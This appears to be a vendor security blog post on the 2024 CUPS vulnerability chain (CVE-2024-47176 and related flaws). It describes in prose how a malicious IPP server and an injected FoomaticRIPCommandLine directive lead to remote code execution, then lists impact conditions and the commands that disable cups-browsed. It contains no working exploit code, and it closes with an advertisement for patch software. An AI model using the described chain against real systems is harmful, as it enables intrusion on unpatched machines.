It’s been a rough year for Linux! The XZ Utils bug caused tremors worldwide in March, and with the recent discovery of a potential chain attack on the CUPS open-source printing system, Linux seems to be caught in a veritable maelstrom of vulnerabilities.
The flaws involved are present within various components of the Common UNIX Printing System, otherwise known as CUPS. This is the most widely used printing system across Linux devices, and the flaws are fairly easy to exploit. Despite the 9.9 CVSS rating and the potential of RCE, the impact is estimated to be relatively low; only systems with very specific configurations can be exploited. This vulnerability, therefore, isn’t necessarily every attacker’s cup of tea.
Technical Details
Before we get into the details of the exploit crafted by researcher Simone “EvilSocket” Margaritelli, let’s take a look at the flaws that comprise it. The affected components are cups-browsed, libcupsfilters, libppd, and cups-filters.
- CVE-2024-47176: In cups-browsed version 2.0.1 and earlier, the service binds to UDP INADDR_ANY:631, accepting packets from any source, which can trigger a “Get-Printer-Attributes” IPP request to a URL controlled by an attacker.
- CVE-2024-47076: In libcupsfilters version 2.1b1 and earlier, the function
cfGetPrinterAttributes5fails to validate or sanitize IPP attributes received from an IPP server, allowing attacker-controlled data to be processed by the rest of the CUPS system. - CVE-2024-47175: In libppd version 2.1b1 and earlier, the function
ppdCreatePPDFromIPP2does not properly validate or sanitize IPP attributes when writing to a temporary PPD file, enabling the injection of attacker-controlled data into the resulting PPD file. - CVE-2024-47177: In cups-filters version 2.0.1 and earlier, the
foomatic-riputility allows arbitrary command execution through theFoomaticRIPCommandLineparameter in PPD files.
A remote, unauthenticated attacker can chain these flaws to achieve RCE by sending a UDP packet to port 631. How, you ask? Here’s the breakdown:
The cups-browsed component handles the discovery of new printers and automatically adds them to the system. It listens on port 631, checks whether connection requests are from a valid source, parses two text fields from the packets received, and passes them on to the found_cups_printer function. Despite the validity check, however, the configuration file for cups-browsed is completely commented out, so connection requests from just about anyone will go through anyway. This is CVE-2024-47176.
One of the text fields sent to the found_cups_printer function is a URL, which is eventually used in cfGetPrinterAttributes5 from libcupsfilters, resulting in cups-browsed connecting to said URL. Essentially, an attacker can send a packet containing some malicious URL to any arbitrary IP running CUPS, and the IP will assume it’s from an IPP server and connect back to the URL.
IPP (which stands for Internet Printing Protocol) is used to facilitate communication between printers and client devices. Once an attacker gets the CUPS IP to connect to their malicious server, and the IP assumes the server is a printer, it will send a GetPrinterAttributes request to obtain information about said printer. It will then register it under its local printers without any further confirmation steps or notifying the user at all, which undoubtedly gives the attacker the most effortless infiltration process of their life. This is CVE-2024-47076.
The attributes are then sent to a temporary PPD (PostScript Printer Definition) file, created with ppdCreatePPDFromIPP2 in the component libppd without any input sanitization. This is CVE-2024-47175. PPD files are used by vendors to describe all the features and commands available to their printers. Here, executables known as filters become relevant. CUPS contains a particularly dangerous filter known as foomatic-rip, which enables the execution of any attacker-specified command via the FoomaticRIPCommandLine directive in PPD files upon sending a print job.
Though the dangers of foomatic-rip are known to the CUPS developers, a permanent fix might cause older printer models to stop working on UNIX completely, so there is no patch in sight as of now. This is CVE-2024-47177.
With all this information in mind, the actual workings of the exploit should be transparent:
- The target machine connects to the malicious IPP server via port 631.
- The attacker specifies PPD directives within an attribute string in response to a
GetPrinterAttributesrequest. - When a print job is sent to the fake printer, the malicious command within the directives are executed.
Impact
As mentioned earlier, the simplicity of this exploit is alarming, but potentially misleading in terms of real-world impact. There are many conditions that must be satisfied for a system to be vulnerable, such as the following:
- The cups-browsed service needs to be manually started in order to expose port 631.
- The victim must attempt to print from the malicious server added to their list of printers.
- The attacker must be able to establish a connection to the computer via UDP, which is commonly disabled.
Then, and only then, can an attacker conduct RCE.
Products Affected
Most GNU/Linux distributions, Oracle Solaris, and potentially Google Chromium/ChromeOS have cups-browsed packaged. There could be other vulnerable distributions as well, since CUPS is supported on UNIX-like operating systems such as FreeBSD, NetBSD, and OpenBSD.
Mitigations and Solutions
Red Hat customers can determine whether their system has cups-browsed running with the following command: sudo systemctl status cups-browsed
To mitigate this vulnerability, run the following commands. These will stop cups-browsed from running and prevent it from starting on reboot.
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
Patches are still being developed, so make sure to apply the mitigation technique; there are possibly hundreds of thousands of vulnerable Linux/UNIX users at the moment and you don’t want to be one of them. Taking the right measures to keep your device protected always pays off. A bitter cup today, a sweet reward tomorrow!
Instantly Fix Risks with SanerNow Patch Management
SanerNow patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. SanerNow patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
